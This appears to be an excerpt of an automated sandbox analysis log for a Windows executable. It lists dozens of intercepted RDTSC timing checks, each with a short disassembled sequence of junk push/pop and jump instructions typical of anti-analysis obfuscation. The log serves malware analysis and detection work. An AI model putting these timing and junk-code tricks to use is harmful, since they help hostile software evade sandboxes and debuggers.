Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D43F1C second address: D43F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D440AD second address: D440B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4C69F second address: D4C6CC instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCBA141C926h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007FCBA141C93Bh 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007FCBA141C933h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4C6CC second address: D4C6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4C6D0 second address: D4C6D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4C6D4 second address: D4C6FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FCBA141FCB8h 0x0000000d jc 00007FCBA141FCACh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4A805 second address: D4A809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4A809 second address: D4A82E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCAAh 0x00000007 jmp 00007FCBA141FCAAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jp 00007FCBA141FCA6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4A82E second address: D4A836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4A836 second address: D4A840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4A9B0 second address: D4A9B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4A9B8 second address: D4A9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4A9BE second address: D4AA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FCBA141C926h 0x0000000a jnl 00007FCBA141C926h 0x00000010 popad 0x00000011 ja 00007FCBA141C954h 0x00000017 jmp 00007FCBA141C939h 0x0000001c jmp 00007FCBA141C935h 0x00000021 js 00007FCBA141C928h 0x00000027 popad 0x00000028 push ebx 0x00000029 pushad 0x0000002a jmp 00007FCBA141C92Eh 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4AA1E second address: D4AA26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4B6ED second address: D4B6F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4BDAB second address: D4BDB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4BDB1 second address: D4BDBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FCBA141C926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4BDBB second address: D4BDE7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBA141FCA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCBA141FCB3h 0x00000011 jmp 00007FCBA141FCADh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4C55B second address: D4C56A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCBA141C926h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4C56A second address: D4C56E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4C56E second address: D4C574 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4C574 second address: D4C580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FCBA141FCA6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D4C580 second address: D4C584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D52E5B second address: D52E80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jg 00007FCBA141FCA6h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D52E80 second address: D52EA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBA141C92Fh 0x00000008 jmp 00007FCBA141C92Bh 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D52EA6 second address: D52EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D52EAC second address: D52EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D55F70 second address: D55F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D622AB second address: D622B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D622B0 second address: D622B5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D622B5 second address: D622BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D622BD second address: D622C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D63DE1 second address: D63DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D63DE5 second address: D63DEB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D63DEB second address: D63DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBA141C92Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D63F52 second address: D63F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D63F56 second address: D63F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D63F5A second address: D63F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D63F60 second address: D63F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D63F69 second address: D63F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D63F71 second address: D63F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D63F7C second address: D63F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D63F80 second address: D63F95 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FCBA141C92Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D63F95 second address: D63FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FCBA141FCA6h 0x0000000a jmp 00007FCBA141FCB8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D63FB7 second address: D63FBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D63FBB second address: D63FC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FCBA141FCACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D6A393 second address: D6A3B7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCBA141C93Ch 0x00000008 jmp 00007FCBA141C936h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D6A3B7 second address: D6A3BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D6F0B0 second address: D6F0BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jp 00007FCBA141C926h 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D6F0BF second address: D6F0C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FCBA141FCA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D6F0C9 second address: D6F0D3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D6F0D3 second address: D6F0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D6F0D9 second address: D6F0DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D79D5C second address: D79D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCBA141FCA6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FCBA141FCA6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D79BD6 second address: D79C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBA141C92Bh 0x0000000e pushad 0x0000000f jc 00007FCBA141C926h 0x00000015 jmp 00007FCBA141C934h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D79C06 second address: D79C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D79C0C second address: D79C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141C92Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D7BF3E second address: D7BF4D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCBA141FCA6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D7BF4D second address: D7BF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D81216 second address: D81224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jng 00007FCBA141FCA6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D81224 second address: D81228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D81228 second address: D81233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D81233 second address: D81239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D81A4C second address: D81A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D824C0 second address: D824E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141C935h 0x00000009 jmp 00007FCBA141C92Bh 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D86CA2 second address: D86CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D86DF7 second address: D86DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D86DFF second address: D86E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jnp 00007FCBA141FCA6h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D86E12 second address: D86E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D86E18 second address: D86E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D86E1C second address: D86E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FCBA141C926h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D86E2C second address: D86E36 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCBA141FCA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D887EE second address: D887F9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D887F9 second address: D88802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D88802 second address: D8880D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D8880D second address: D88813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: D8B9F7 second address: D8BA0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA141C931h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: DCC726 second address: DCC72C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: DCC72C second address: DCC731 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: DD850C second address: DD8526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141FCB6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exe RDTSC instruction interceptor: First address: DD8526 second address: DD854E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C935h 0x00000007 jmp 00007FCBA141C92Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: EA7936 second address: EA793B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: EA793B second address: EA796C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCBA141C930h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: EA796C second address: EA797E instructions: 0x00000000 rdtsc 0x00000002 je 00007FCBA141FCA6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: EA797E second address: EA799A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C938h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: EAC4C4 second address: EAC563 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FCBA141FCA8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push ebx 0x00000027 mov dx, di 0x0000002a pop edx 0x0000002b xor edx, 31337F76h 0x00000031 push 00000004h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FCBA141FCA8h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d mov edx, 0744A953h 0x00000052 call 00007FCBA141FCA9h 0x00000057 jmp 00007FCBA141FCB0h 0x0000005c push eax 0x0000005d jmp 00007FCBA141FCABh 0x00000062 mov eax, dword ptr [esp+04h] 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 pushad 0x0000006a popad 0x0000006b jbe 00007FCBA141FCA6h 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: EAF3B1 second address: EAF3C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C931h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: EB139E second address: EB13A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: EB13A3 second address: EB13CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Bh 0x00000007 pushad 0x00000008 jmp 00007FCBA141C939h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C000A second address: 71C0029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, 8Fh 0x0000000d mov di, 66E4h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov esi, ebx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0029 second address: 71C006C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FCBA141C939h 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007FCBA141C938h 0x00000015 pop eax 0x00000016 mov ebx, 0E5939E6h 0x0000001b popad 0x0000001c rdtsc
